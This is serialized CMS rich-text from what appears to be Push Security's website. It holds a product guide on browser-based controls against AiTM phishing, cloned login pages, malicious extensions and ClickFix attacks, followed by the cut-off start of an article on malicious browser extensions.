tooling.",[],{},{"nodeType":178,"data":2013,"content":2014},{},[2015,2019,2029],{"nodeType":173,"value":2016,"marks":2017,"data":2018},"For example, network proxies see HTTP requests, URLs, and page headers, but not the ",[],{},{"nodeType":1698,"data":2020,"content":2024},{"target":2021},{"sys":2022},{"id":2023,"type":317,"linkType":318},"5caCcGCqMMPm5KlwUv0sbz",[2025],{"nodeType":173,"value":2026,"marks":2027,"data":2028},"structural elements",[],{},{"nodeType":173,"value":2030,"marks":2031,"data":2032}," of the DOM or on-page user interactions that are key to fingerprinting the behavior of AiTM phishing kits or ClickFix-style social engineering attacks. ",[],{},{"nodeType":178,"data":2034,"content":2035},{},[2036,2040,2050,2054,2064],{"nodeType":173,"value":2037,"marks":2038,"data":2039},"Similarly, ",[],{},{"nodeType":1698,"data":2041,"content":2045},{"target":2042},{"sys":2043},{"id":2044,"type":317,"linkType":318},"6YWYKGESlyUKQxvhKmBzeH",[2046],{"nodeType":173,"value":2047,"marks":2048,"data":2049},"EDR tools",[],{},{"nodeType":173,"value":2051,"marks":2052,"data":2053}," only see the bad thing when it hits the endpoint, and many ",[],{},{"nodeType":1698,"data":2055,"content":2059},{"target":2056},{"sys":2057},{"id":2058,"type":317,"linkType":318},"2k2aDK5dyQKlQBrk66pMXE",[2060],{"nodeType":173,"value":2061,"marks":2062,"data":2063},"cloud security tools",[],{},{"nodeType":173,"value":2065,"marks":2066,"data":2067}," rely on complex policy configurations across a core set of apps to provide security protection — leaving a gap in detection and response capabilities outside their purview.",[],{},{"nodeType":312,"data":2069,"content":2073},{"target":2070},{"sys":2071},{"id":2072,"type":317,"linkType":318},"50NyBpr96dKspvTzJTBOlC",[],{"nodeType":235,"data":2075,"content":2076},{},[2077],{"nodeType":173,"value":2078,"marks":2079,"data":2080},"Provide just-in-time security enforcement",[],{},{"nodeType":178,"data":2082,"content":2083},{},[2084,2088,2096],{"nodeType":173,"value":2085,"marks":2086,"data":2087},"As some of our customers like to say, Push provides security teams with a ",[],{},{"nodeType":186,"data":2089,"content":2091},{"uri":2090},"/customer-stories/upvest",[2092],{"nodeType":173,"value":2093,"marks":2094,"data":2095},"“seat on the user’s side”",[],{},{"nodeType":173,"value":2097,"marks":2098,"data":2099}," of the equation so you can enforce security best practices.",[],{},{"nodeType":178,"data":2101,"content":2102},{},[2103],{"nodeType":173,"value":2104,"marks":2105,"data":2106},"Having that seat on the user’s side also helps you deliver guidance in the right context for it to be followed: When the user is engaged in doing the behavior you want to influence (or prevent). The right information, at the right time, in the right format — not a belated reminder through a different channel that’s easy to ignore.",[],{},{"nodeType":178,"data":2108,"content":2109},{},[2110],{"nodeType":173,"value":2111,"marks":2112,"data":2113},"With those outcomes in mind, let’s look at some specific solutions from the Push platform.",[],{},{"nodeType":231,"data":2115,"content":2116},{},[],{"nodeType":169,"data":2118,"content":2119},{},[2120],{"nodeType":173,"value":2121,"marks":2122,"data":2124},"How Push helps you protect users from browser-based ATO, ClickFix, and similar attacks",[2123],{"type":370},{},{"nodeType":178,"data":2126,"content":2127},{},[2128],{"nodeType":173,"value":2129,"marks":2130,"data":2131},"The Push platform provides out-of-the-box detections for browser-based attacks, including:",[],{},{"nodeType":250,"data":2133,"content":2134},{},[2135,2158,2181,2202],{"nodeType":254,"data":2136,"content":2137},{},[2138],{"nodeType":178,"data":2139,"content":2140},{},[2141,2144,2154],{"nodeType":173,"value":37,"marks":2142,"data":2143},[],{},{"nodeType":1698,"data":2145,"content":2149},{"target":2146},{"sys":2147},{"id":2148,"type":317,"linkType":318},"7KRnTSnJAbbiho69gNyN0B",[2150],{"nodeType":173,"value":2151,"marks":2152,"data":2153},"AiTM phishing kits",[],{},{"nodeType":173,"value":2155,"marks":2156,"data":2157}," that can bypass MFA",[],{},{"nodeType":254,"data":2159,"content":2160},{},[2161],{"nodeType":178,"data":2162,"content":2163},{},[2164,2167,2177],{"nodeType":173,"value":37,"marks":2165,"data":2166},[],{},{"nodeType":1698,"data":2168,"content":2172},{"target":2169},{"sys":2170},{"id":2171,"type":317,"linkType":318},"jN3GN5ddMJZiDtl0fgUVd",[2173],{"nodeType":173,"value":2174,"marks":2175,"data":2176},"Cloned login pages",[],{},{"nodeType":173,"value":2178,"marks":2179,"data":2180}," designed to steal user credentials",[],{},{"nodeType":254,"data":2182,"content":2183},{},[2184],{"nodeType":178,"data":2185,"content":2186},{},[2187,2190,2199],{"nodeType":173,"value":37,"marks":2188,"data":2189},[],{},{"nodeType":1698,"data":2191,"content":2195},{"target":2192},{"sys":2193},{"id":2194,"type":317,"linkType":318},"5NyiWgjMDwk16XZ0S681JK",[2196],{"nodeType":173,"value":1186,"marks":2197,"data":2198},[],{},{"nodeType":173,"value":37,"marks":2200,"data":2201},[],{},{"nodeType":254,"data":2203,"content":2204},{},[2205],{"nodeType":178,"data":2206,"content":2207},{},[2208,2211,2221],{"nodeType":173,"value":37,"marks":2209,"data":2210},[],{},{"nodeType":1698,"data":2212,"content":2216},{"target":2213},{"sys":2214},{"id":2215,"type":317,"linkType":318},"7jygmadjoz0asAHv7e5PuK",[2217],{"nodeType":173,"value":2218,"marks":2219,"data":2220},"Malicious copy and paste attacks",[],{},{"nodeType":173,"value":2222,"marks":2223,"data":2224}," like ClickFix, FileFix, and similar",[],{},{"nodeType":178,"data":2226,"content":2227},{},[2228],{"nodeType":173,"value":2229,"marks":2230,"data":2231},"For each of these attack vectors, Push delivers detection events and associated metadata for quick triage by the security team, as well as employee-facing warn or block screens, based on your selected configuration.",[],{},{"nodeType":178,"data":2233,"content":2234},{},[2235],{"nodeType":173,"value":2236,"marks":2237,"data":2238},"Here’s a snapshot of the capabilities of these controls and what end-users will experience.",[],{},{"nodeType":235,"data":2240,"content":2241},{},[2242],{"nodeType":173,"value":2243,"marks":2244,"data":2246},"The scenario:",[2245],{"type":370},{},{"nodeType":178,"data":2248,"content":2249},{},[2250],{"nodeType":173,"value":2251,"marks":2252,"data":2253},"When a user encounters a malicious page — whether that’s an AiTM phishing tool running on a webpage, or a ClickFix-style attack — or attempts to install a malicious extension, Push immediately steps in. ",[],{},{"nodeType":178,"data":2255,"content":2256},{},[2257],{"nodeType":173,"value":2258,"marks":2259,"data":2260},"Push can prevent users from entering their credentials on phishing pages, including cloned login pages, or from pasting malicious clipboard contents that can run malware on their device. Push can also prevent users from installing known-bad browser extensions. ",[],{},{"nodeType":178,"data":2262,"content":2263},{},[2264],{"nodeType":173,"value":2265,"marks":2266,"data":2267},"In each of these scenarios, Push admins get detailed detection information they can use to triage the incident.",[],{},{"nodeType":312,"data":2269,"content":2273},{"target":2270},{"sys":2271},{"id":2272,"type":317,"linkType":318},"5jR3YVUiusHGnXDOyrgYpr",[],{"nodeType":235,"data":2275,"content":2276},{},[2277],{"nodeType":173,"value":2278,"marks":2279,"data":2281},"How it works:",[2280],{"type":370},{},{"nodeType":178,"data":2283,"content":2284},{},[2285],{"nodeType":173,"value":2286,"marks":2287,"data":2288},"Rather than relying on known-bad intelligence like domains or URLs, Push performs a behavioral and structural analysis of malicious pages in real time.",[],{},{"nodeType":178,"data":2290,"content":2291},{},[2292],{"nodeType":173,"value":2293,"marks":2294,"data":2295},"That means a phishing page never has to appear in a threat intelligence feed in order to be detected and blocked.",[],{},{"nodeType":178,"data":2297,"content":2298},{},[2299],{"nodeType":173,"value":2300,"marks":2301,"data":2302},"Similarly, for malicious copy and paste attacks like ClickFix, Push analyzes the content copied to the clipboard but also evaluates the context of the page to reduce false positives. In blocking mode, Push’s control for ClickFix-style attacks replaces the malicious clipboard contents with safe text — preventing potential endpoint compromise before it can occur.",[],{},{"nodeType":312,"data":2304,"content":2308},{"target":2305},{"sys":2306},{"id":2307,"type":317,"linkType":318},"3OkejjEjV9xflBc5ouOVFn",[],{"nodeType":178,"data":2310,"content":2311},{},[2312],{"nodeType":173,"value":2313,"marks":2314,"data":2315},"Finally, for identifying malicious browser extensions, Push takes a slightly different approach — combining both behavioral detections and curated intelligence of known-bad extensions from our own research and from trusted industry sources. We’ve found this combination provides the highest-fidelity way to identify malicious extensions without relying on approaches like analyzing extension permissions, which often isn’t actionable. ",[],{},{"nodeType":235,"data":2317,"content":2318},{},[2319],{"nodeType":173,"value":2320,"marks":2321,"data":2323},"Your security team gets:",[2322],{"type":370},{},{"nodeType":178,"data":2325,"content":2326},{},[2327,2331,2339],{"nodeType":173,"value":2328,"marks":2329,"data":2330},"Readymade detection and alerting, combined with detailed telemetry. Detections and their associated metadata can be consumed via ",[],{},{"nodeType":186,"data":2332,"content":2334},{"uri":2333},"/help/audience/administrators/docs/getting-started/#api-and-webhooks",[2335],{"nodeType":173,"value":2336,"marks":2337,"data":2338},"Push’s REST API and webhooks",[],{},{"nodeType":173,"value":2340,"marks":2341,"data":2342},". ",[],{},{"nodeType":235,"data":2344,"content":2345},{},[2346],{"nodeType":173,"value":2347,"marks":2348,"data":2350},"Your end-users see:",[2349],{"type":370},{},{"nodeType":178,"data":2352,"content":2353},{},[2354],{"nodeType":173,"value":2355,"marks":2356,"data":2357},"An immediate block screen in your company colors and brand style, providing a highly memorable, contextual moment of learning — and reassuring them that an incident has been prevented.",[],{},{"nodeType":312,"data":2359,"content":2363},{"target":2360},{"sys":2361},{"id":2362,"type":317,"linkType":318},"4QfjDDfKjohKr1qqDLRT0m",[],{"nodeType":231,"data":2365,"content":2366},{},[],{"nodeType":169,"data":2368,"content":2369},{},[2370],{"nodeType":173,"value":2371,"marks":2372,"data":2374},"How Push helps you remediate account vulnerabilities at scale",[2373],{"type":370},{},{"nodeType":178,"data":2376,"content":2377},{},[2378],{"nodeType":173,"value":2379,"marks":2380,"data":2381},"Just-in-time security enforcement works best when it’s trustworthy and contextual — without making a lot more work for your team. Push also provides readymade controls for remediating common account vulnerabilities that contribute to your attack surface online, helping you harden existing accounts and reduce behaviors that introduce new risks.",[],{},{"nodeType":178,"data":2383,"content":2384},{},[2385],{"nodeType":173,"value":2386,"marks":2387,"data":2388},"With Push, you can:",[],{},{"nodeType":250,"data":2390,"content":2391},{},[2392,2415,2452,2476],{"nodeType":254,"data":2393,"content":2394},{},[2395],{"nodeType":178,"data":2396,"content":2397},{},[2398,2401,2411],{"nodeType":173,"value":37,"marks":2399,"data":2400},[],{},{"nodeType":1698,"data":2402,"content":2406},{"target":2403},{"sys":2404},{"id":2405,"type":317,"linkType":318},"6FYHbkcRUrtznPo7RarRsz",[2407],{"nodeType":173,"value":2408,"marks":2409,"data":2410},"Prevent the phishing or reuse of high-value passwords",[],{},{"nodeType":173,"value":2412,"marks":2413,"data":2414},", like your IdP, AWS, or code repository passwords.",[],{},{"nodeType":254,"data":2416,"content":2417},{},[2418],{"nodeType":178,"data":2419,"content":2420},{},[2421,2425,2435,2438,2448],{"nodeType":173,"value":2422,"marks":2423,"data":2424},"Remediate ",[],{},{"nodeType":1698,"data":2426,"content":2430},{"target":2427},{"sys":2428},{"id":2429,"type":317,"linkType":318},"2WAc5HflKonFN7Jc53ROgj",[2431],{"nodeType":173,"value":2432,"marks":2433,"data":2434},"missing MFA",[],{},{"nodeType":173,"value":1464,"marks":2436,"data":2437},[],{},{"nodeType":1698,"data":2439,"content":2443},{"target":2440},{"sys":2441},{"id":2442,"type":317,"linkType":318},"2dAP36chda6ZDGKzw0Itfs",[2444],{"nodeType":173,"value":2445,"marks":2446,"data":2447},"insecure passwords",[],{},{"nodeType":173,"value":2449,"marks":2450,"data":2451}," on any work app, even those not managed by your SSO solution.",[],{},{"nodeType":254,"data":2453,"content":2454},{},[2455],{"nodeType":178,"data":2456,"content":2457},{},[2458,2462,2472],{"nodeType":173,"value":2459,"marks":2460,"data":2461},"Use ",[],{},{"nodeType":1698,"data":2463,"content":2467},{"target":2464},{"sys":2465},{"id":2466,"type":317,"linkType":318},"2ZpKnuljaUH0jzVaae4SMN",[2468],{"nodeType":173,"value":2469,"marks":2470,"data":2471},"in-browser banners",[],{},{"nodeType":173,"value":2473,"marks":2474,"data":2475}," to add guardrails to app usage, including blocking unapproved SaaS or collecting a business reason to access an app before approving it.",[],{},{"nodeType":254,"data":2477,"content":2478},{},[2479],{"nodeType":178,"data":2480,"content":2481},{},[2482,2485,2495],{"nodeType":173,"value":37,"marks":2483,"data":2484},[],{},{"nodeType":1698,"data":2486,"content":2490},{"target":2487},{"sys":2488},{"id":2489,"type":317,"linkType":318},"3ibVBa6u0XfcXXDVtON5th",[2491],{"nodeType":173,"value":2492,"marks":2493,"data":2494},"Block unwanted or unapproved browser extensions",[],{},{"nodeType":173,"value":2496,"marks":2497,"data":2498}," from being installed, or disable them if they’ve been installed previously.",[],{},{"nodeType":178,"data":2500,"content":2501},{},[2502],{"nodeType":173,"value":2236,"marks":2503,"data":2504},[],{},{"nodeType":235,"data":2506,"content":2507},{},[2508],{"nodeType":173,"value":2243,"marks":2509,"data":2511},[2510],{"type":370},{},{"nodeType":178,"data":2513,"content":2514},{},[2515],{"nodeType":173,"value":2516,"marks":2517,"data":2518},"Push uses in-browser controls to intervene when a user is missing MFA; reusing a high-value password; using an insecure password; attempting to log in to an unapproved app; or attempting to install a blocked extension. ",[],{},{"nodeType":178,"data":2520,"content":2521},{},[2522],{"nodeType":173,"value":2523,"marks":2524,"data":2525},"Push can block users from reusing passwords set as “protected” (meaning they can’t be reused on any other page or app) or from using unapproved apps or extensions. Push can guide users to update their password or register for MFA on accounts where they lack it. Push can also provide any other specific security or policy guidance to employees via banners that appear on apps in your environment, including GenAI apps. ",[],{},{"nodeType":178,"data":2527,"content":2528},{},[2529],{"nodeType":173,"value":2530,"marks":2531,"data":2532},"For all of these scenarios, you can tune Push controls to your preferred mode (informing vs. blocking, for example) and select which employees, employee groups, and apps or accounts to focus on.",[],{},{"nodeType":178,"data":2534,"content":2535},{},[2536],{"nodeType":173,"value":2537,"marks":2538,"data":2539},"You can also customize the message that employees see, to match your organizational culture and policies.",[],{},{"nodeType":235,"data":2541,"content":2542},{},[2543],{"nodeType":173,"value":2544,"marks":2545,"data":2547},"How it works: ",[2546],{"type":370},{},{"nodeType":178,"data":2549,"content":2550},{},[2551],{"nodeType":173,"value":2552,"marks":2553,"data":2554},"The Push browser agent observes real-time user behavior and securely analyzes users’ account vulnerabilities in order to identify risks and execute your preconfigured controls. ",[],{},{"nodeType":178,"data":2556,"content":2557},{},[2558],{"nodeType":173,"value":2559,"marks":2560,"data":2561},"To identify MFA status, Push uses the app’s own API to query the logged-in user’s registered MFA methods. To analyze password security, Push creates a salted, truncated hash that is stored locally in the user’s browser and then used for comparison to find reused passwords, leaked passwords, and shared passwords. ",[],{},{"nodeType":178,"data":2563,"content":2564},{},[2565,2569,2574,2577,2582],{"nodeType":173,"value":2566,"marks":2567,"data":2568},"Using the ",[],{},{"nodeType":173,"value":2570,"marks":2571,"data":2573},"MFA enforcement",[2572],{"type":370},{},{"nodeType":173,"value":933,"marks":2575,"data":2576},[],{},{"nodeType":173,"value":2578,"marks":2579,"data":2581},"Strong password enforcement",[2580],{"type":370},{},{"nodeType":173,"value":2583,"marks":2584,"data":2585}," controls, you can then automatically display a banner to users with those account vulnerabilities, guiding them to fix the issue.",[],{},{"nodeType":312,"data":2587,"content":2591},{"target":2588},{"sys":2589},{"id":2590,"type":317,"linkType":318},"7Ka4CumZk9it6GsdlNHREA",[],{"nodeType":178,"data":2593,"content":2594},{},[2595,2599,2604],{"nodeType":173,"value":2596,"marks":2597,"data":2598},"Using Push’s ",[],{},{"nodeType":173,"value":2600,"marks":2601,"data":2603},"Password protection",[2602],{"type":370},{},{"nodeType":173,"value":2605,"marks":2606,"data":2607}," control, you can select apps where you want to essentially “pin” the high-value password to only that app and prevent its reuse (or phishing) on any other domain. ",[],{},{"nodeType":178,"data":2609,"content":2610},{},[2611,2614,2619],{"nodeType":173,"value":2596,"marks":2612,"data":2613},[],{},{"nodeType":173,"value":2615,"marks":2616,"data":2618},"Browser extension blocking",[2617],{"type":370},{},{"nodeType":173,"value":2620,"marks":2621,"data":2622}," control, you can create a blocklist or allowlist of extensions and prevent users from installing or enabling blocked extensions.",[],{},{"nodeType":178,"data":2624,"content":2625},{},[2626,2630,2635],{"nodeType":173,"value":2627,"marks":2628,"data":2629},"Finally, using Push’s ",[],{},{"nodeType":173,"value":2631,"marks":2632,"data":2634},"App banners",[2633],{"type":370},{},{"nodeType":173,"value":2636,"marks":2637,"data":2638}," feature, you can add custom messages in a range of modes — from informing to blocking — to apps in use across your business, or even specific URL patterns.",[],{},{"nodeType":312,"data":2640,"content":2644},{"target":2641},{"sys":2642},{"id":2643,"type":317,"linkType":318},"5Mq4PEzEhW8p1qLvS9aZMm",[],{"nodeType":235,"data":2646,"content":2647},{},[2648],{"nodeType":173,"value":2649,"marks":2650,"data":2652},"Your security team gets: ",[2651],{"type":370},{},{"nodeType":178,"data":2654,"content":2655},{},[2656],{"nodeType":173,"value":2657,"marks":2658,"data":2659},"A flexible and highly configurable set of controls to solve account vulnerabilities at scale and to enforce your security controls around browser extensions and app usage.",[],{},{"nodeType":235,"data":2661,"content":2662},{},[2663],{"nodeType":173,"value":2664,"marks":2665,"data":2667},"Your end-users see: ",[2666],{"type":370},{},{"nodeType":178,"data":2669,"content":2670},{},[2671],{"nodeType":173,"value":2672,"marks":2673,"data":2674},"Contextual, actionable guidance in the midst of their actual workflow, helping them fix the issue or guiding them to safety.",[],{},{"nodeType":231,"data":2676,"content":2677},{},[],{"nodeType":169,"data":2679,"content":2680},{},[2681],{"nodeType":173,"value":2682,"marks":2683,"data":2685},"Implementation tips",[2684],{"type":370},{},{"nodeType":178,"data":2687,"content":2688},{},[2689],{"nodeType":173,"value":2690,"marks":2691,"data":2692},"Push allows you to set the scope and mode of each control, making it simple to roll out. ",[],{},{"nodeType":178,"data":2694,"content":2695},{},[2696,2700,2705,2709,2713,2717,2722],{"nodeType":173,"value":2697,"marks":2698,"data":2699},"We recommend starting in ",[],{},{"nodeType":173,"value":2701,"marks":2702,"data":2704},"Monitor",[2703],{"type":370},{},{"nodeType":173,"value":2706,"marks":2707,"data":2708}," mode for controls that intervene in end-user activities. That way, you can perform testing with sample malicious sites or scenarios like reused protected passwords, tune out any benign true positives, and develop the messaging you want to use on warn or block pages. (For controls without an explicit monitor mode, like ",[],{},{"nodeType":173,"value":2578,"marks":2710,"data":2712},[2711],{"type":370},{},{"nodeType":173,"value":2714,"marks":2715,"data":2716},", you can still monitor for related events on the ",[],{},{"nodeType":173,"value":2718,"marks":2719,"data":2721},"Events",[2720],{"type":370},{},{"nodeType":173,"value":2723,"marks":2724,"data":2725}," page, such as account security findings, or by consuming webhooks into a downstream tool.)",[],{},{"nodeType":312,"data":2727,"content":2731},{"target":2728},{"sys":2729},{"id":2730,"type":317,"linkType":318},"7vk8DHv01cM1o2C0ZpAvZu",[],{"nodeType":178,"data":2733,"content":2734},{},[2735,2739,2744,2747,2752],{"nodeType":173,"value":2736,"marks":2737,"data":2738},"When you’re ready, set the mode to ",[],{},{"nodeType":173,"value":2740,"marks":2741,"data":2743},"Warn",[2742],{"type":370},{},{"nodeType":173,"value":1464,"marks":2745,"data":2746},[],{},{"nodeType":173,"value":2748,"marks":2749,"data":2751},"Block",[2750],{"type":370},{},{"nodeType":173,"value":2753,"marks":2754,"data":2755}," and use the scope options to perform a phased rollout to your user population by adding additional user groups to the control until you have complete coverage of your population.",[],{},{"nodeType":178,"data":2757,"content":2758},{},[2759],{"nodeType":173,"value":2760,"marks":2761,"data":2762},"By consuming webhook events into your SIEM, you can integrate Push alerts into your existing security workflows, monitoring for new detections or tracking when account vulnerabilities are resolved.",[],{},{"nodeType":231,"data":2764,"content":2765},{},[],{"nodeType":169,"data":2767,"content":2768},{},[2769],{"nodeType":173,"value":2770,"marks":2771,"data":2773},"Enhancing user trust with custom branding",[2772],{"type":370},{},{"nodeType":178,"data":2775,"content":2776},{},[2777],{"nodeType":173,"value":2778,"marks":2779,"data":2780},"We recently released the option to customize the look and feel of all employee-facing banners and block pages. ",[],{},{"nodeType":178,"data":2782,"content":2783},{},[2784,2788,2793],{"nodeType":173,"value":2785,"marks":2786,"data":2787},"From the ",[],{},{"nodeType":173,"value":2789,"marks":2790,"data":2792},"Settings",[2791],{"type":370},{},{"nodeType":173,"value":2794,"marks":2795,"data":2796}," page in the Push admin console, you can upload your logo, add accent colors, and choose from light or dark backgrounds.",[],{},{"nodeType":312,"data":2798,"content":2802},{"target":2799},{"sys":2800},{"id":2801,"type":317,"linkType":318},"51lk1VRP20G7H4PAoRZANI",[],{"nodeType":178,"data":2804,"content":2805},{},[2806],{"nodeType":173,"value":2807,"marks":2808,"data":2809},"Custom branding increases the trustworthiness of these in-the-moment security guardrails so that users recognize them immediately and act on their guidance.",[],{},{"nodeType":178,"data":2811,"content":2812},{},[2813],{"nodeType":173,"value":2814,"marks":2815,"data":2816},"The result: Better compliance and lower friction for you and your employees.",[],{},{"nodeType":231,"data":2818,"content":2819},{},[],{"nodeType":169,"data":2821,"content":2822},{},[2823],{"nodeType":173,"value":2824,"marks":2825,"data":2827},"Learn more about Push",[2826],{"type":370},{},{"nodeType":178,"data":2829,"content":2830},{},[2831,2835,2842],{"nodeType":173,"value":2832,"marks":2833,"data":2834},"Push Security’s browser-based security platform stops browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking — ",[],{},{"nodeType":186,"data":2836,"content":2837},{"uri":86},[2838],{"nodeType":173,"value":2839,"marks":2840,"data":2841},"modern attack techniques",[],{},{"nodeType":173,"value":2843,"marks":2844,"data":2845}," that are the leading cause of breaches today.",[],{},{"nodeType":178,"data":2847,"content":2848},{},[2849],{"nodeType":173,"value":2850,"marks":2851,"data":2852},"You don’t need to wait until it all goes wrong either. You can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",[],{},{"nodeType":178,"data":2854,"content":2855},{},[2856,2860,2868,2872,2880,2884,2892],{"nodeType":173,"value":2857,"marks":2858,"data":2859},"Want to learn more about Push? Check out our latest ",[],{},{"nodeType":186,"data":2861,"content":2863},{"uri":2862},"/resources/product-brochure",[2864],{"nodeType":173,"value":2865,"marks":2866,"data":2867},"product overview",[],{},{"nodeType":173,"value":2869,"marks":2870,"data":2871},", visit our ",[],{},{"nodeType":186,"data":2873,"content":2875},{"uri":2874},"/product-demo/",[2876],{"nodeType":173,"value":2877,"marks":2878,"data":2879},"demo library",[],{},{"nodeType":173,"value":2881,"marks":2882,"data":2883},", or book some time with one of our team for a ",[],{},{"nodeType":186,"data":2885,"content":2887},{"uri":2886},"/demo",[2888],{"nodeType":173,"value":2889,"marks":2890,"data":2891},"live demo",[],{},{"nodeType":173,"value":1477,"marks":2893,"data":2894},[],{},"Guide: How to use Push controls to protect your users from modern browser threats","How to use in-browser controls to stop browser-based attacks before compromise can occur","2026-04-08T00:00:00.000Z","guide-how-to-use-push-controls-to-protect-your-users-from-modern-attacks",{"items":2900},[2901,2903],{"sys":2902,"name":505},{"id":504},{"sys":2904,"name":509},{"id":508},{"items":2906},[2907],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":2910},"Kelly Davenport","Kelly",{"url":2911},"https://images.ctfassets.net/y1cdw1ablpvd/1hi8bEuVfn5sF57LivAq6d/9a3b82426c697d765e2e450e33a18424/kelly_profile_pic.jpeg",{"__typename":1528,"sys":2913,"content":2915,"title":3962,"synopsis":3963,"hashTags":118,"publishedDate":3964,"slug":3965,"tagsCollection":3966,"authorsCollection":3972},{"id":2914},"4DqTwJKeCSPnJUc6YPFC5A",{"json":2916},{"nodeType":165,"data":2917,"content":2918},{},[2919,2989,2996,3002,3005,3013,3020,3027,3035,3042,3098,3115,3122,3129,3132,3140,3147,3209,3217,3224,3230,3236,3243,3250,3268,3275,3323,3329,3337,3358,3365,3372,3465,3472,3488,3494,3501,3508,3515,3522,3583,3589,3595,3603,3610,3617,3640,3647,3653,3675,3681,3688,3695,3702,3709,3742,3761,3768,3780,3783,3791,3798,3804,3807,3815,3823,3830,3849,3856,3863,3869,3876,3883,3889,3892,3899,3915,3921],{"nodeType":178,"data":2920,"content":2921},{},[2922,2926,2935,2939,2948,2951,2960,2964,2973,2976,2985],{"nodeType":173,"value":2923,"marks":2924,"data":2925},"Attackers are doubling down on malicious browser extensions as their method of choice. Recent campaigns like ",[],{},{"nodeType":186,"data":2927,"content":2929},{"uri":2928},"https://www.bleepingcomputer.com/news/security/shadypanda-browser-extensions-amass-43m-installs-in-malicious-campaign/",[2930],{"nodeType":173,"value":2931,"marks":2932,"data":2934},"ShadyPanda",[2933],{"type":194},{},{"nodeType":173,"value":2936,"marks":2937,"data":2938},", ",[],{},{"nodeType":186,"data":2940,"content":2942},{"uri":2941},"https://www.bleepingcomputer.com/news/security/zoom-stealer-browser-extensions-harvest-corporate-meeting-intelligence/",[2943],{"nodeType":173,"value":2944,"marks":2945,"data":2947},"ZoomStealer",[2946],{"type":194},{},{"nodeType":173,"value":2936,"marks":2949,"data":2950},[],{},{"nodeType":186,"data":2952,"content":2954},{"uri":2953},"https://www.bleepingcomputer.com/news/security/malicious-ghostposter-browser-extensions-found-with-840-000-installs/",[2955],{"nodeType":173,"value":2956,"marks":2957,"data":2959},"GhostPoster",[2958],{"type":194},{},{"nodeType":173,"value":2961,"marks":2962,"data":2963},", and the breaches impacting vendors like ",[],{},{"nodeType":186,"data":2965,"content":2967},{"uri":2966},"https://www.bleepingcomputer.com/news/security/cybersecurity-firms-chrome-extension-hijacked-to-steal-users-data/",[2968],{"nodeType":173,"value":2969,"marks":2970,"data":2972},"Cyberhaven",[2971],{"type":194},{},{"nodeType":173,"value":933,"marks":2974,"data":2975},[],{},{"nodeType":186,"data":2977,"content":2979},{"uri":2978},"https://www.bleepingcomputer.com/news/security/trust-wallet-confirms-extension-hack-led-to-7-million-crypto-theft/",[2980],{"nodeType":173,"value":2981,"marks":2982,"data":2984},"Trust Wallet",[2983],{"type":194},{},{"nodeType":173,"value":2986,"marks":2987,"data":2988},", all highlight the threat posed by malicious extensions. ",[],{},{"nodeType":178,"data":2990,"content":2991},{},[2992],{"nodeType":173,"value":2993,"marks":2994,"data":2995},"Most malicious extensions didn’t start that way. Attackers often begin with a legitimate extension — either by creating something that is initially benign, purchasing an extension that already exists and has a large number of installs, or by phishing an extension developer’s account to publish a malicious version. Then, they bide their time, waiting for the right moment to flip the switch and deploy a malicious update, compromising every browser that they’re deployed to. ",[],{},{"nodeType":312,"data":2997,"content":3001},{"target":2998},{"sys":2999},{"id":3000,"type":317,"linkType":318},"7eTmqh5jqYA3l1Xk4GikVO",[],{"nodeType":231,"data":3003,"content":3004},{},[],{"nodeType":169,"data":3006,"content":3007},{},[3008],{"nodeType":173,"value":3009,"marks":3010,"data":3012},"Why tackling malicious extensions is a hard problem for security teams",[3011],{"type":370},{},{"nodeType":178,"data":3014,"content":3015},{},[3016],{"nodeType":173,"value":3017,"marks":3018,"data":3019},"The Chrome extension store alone has in excess of 100k extensions with a wide range of use cases. Pretty much every major app today has an extension counterpart, and there are countless smaller extensions — from AI overlays, to screen recording, spell checking, and color matching. AI-assisted development has further increased the rate at which new extensions are created and added to the marketplace (for both legit developers and malicious ones). ",[],{},{"nodeType":178,"data":3021,"content":3022},{},[3023],{"nodeType":173,"value":3024,"marks":3025,"data":3026},"For organizations just beginning to think about extension management, this isn’t an easy problem to get a handle on. If you’ve allowed your employees to freely install extensions without restriction, then there could be hundreds, if not thousands, of different extensions in use across your business. ",[],{},{"nodeType":235,"data":3028,"content":3029},{},[3030],{"nodeType":173,"value":3031,"marks":3032,"data":3034},"Malicious extensions are good at hiding bad code",[3033],{"type":370},{},{"nodeType":178,"data":3036,"content":3037},{},[3038],{"nodeType":173,"value":3039,"marks":3040,"data":3041},"Right now, extension stores are fighting a losing battle against attackers. ",[],{},{"nodeType":250,"data":3043,"content":3044},{},[3045,3068,3078,3088],{"nodeType":254,"data":3046,"content":3047},{},[3048],{"nodeType":178,"data":3049,"content":3050},{},[3051,3055,3064],{"nodeType":173,"value":3052,"marks":3053,"data":3054},"Malicious extensions are being regularly uploaded, bypassing code analysis checks, and even achieving ",[],{},{"nodeType":186,"data":3056,"content":3058},{"uri":3057},"https://thehackernews.com/2026/02/malicious-chrome-extensions-caught.html",[3059],{"nodeType":173,"value":3060,"marks":3061,"data":3063},"“Featured” or “Verified” status",[3062],{"type":194},{},{"nodeType":173,"value":3065,"marks":3066,"data":3067}," in the app stores. This is because attackers are using dynamically compiled, stealthily smuggled code that can’t be reliably spotted through static code checks or sandbox analysis. ",[],{},{"nodeType":254,"data":3069,"content":3070},{},[3071],{"nodeType":178,"data":3072,"content":3073},{},[3074],{"nodeType":173,"value":3075,"marks":3076,"data":3077},"Bad isn't detected until an extension is observed doing malicious things in the wild. Most of the time, this is because there’s been a breach. ",[],{},{"nodeType":254,"data":3079,"content":3080},{},[3081],{"nodeType":178,"data":3082,"content":3083},{},[3084],{"nodeType":173,"value":3085,"marks":3086,"data":3087},"When an extension is reported as bad, it enters a lengthy review process. Unless there’s pressure to act quickly (e.g. there’s a large amount of reporting), it won’t get prioritized. ",[],{},{"nodeType":254,"data":3089,"content":3090},{},[3091],{"nodeType":178,"data":3092,"content":3093},{},[3094],{"nodeType":173,"value":3095,"marks":3096,"data":3097},"Just because an extension is removed from the store doesn’t mean that it’s automatically removed from browsers where it is installed. ",[],{},{"nodeType":178,"data":3099,"content":3100},{},[3101,3106,3110],{"nodeType":173,"value":3102,"marks":3103,"data":3105},"The bottom line:",[3104],{"type":370},{},{"nodeType":173,"value":3107,"marks":3108,"data":3109}," ",[],{},{"nodeType":173,"value":3111,"marks":3112,"data":3114},"The security teams at Google and Microsoft analyse and manually approve every single extension upload and code change that enters their store, and even they aren’t detecting bad before malware 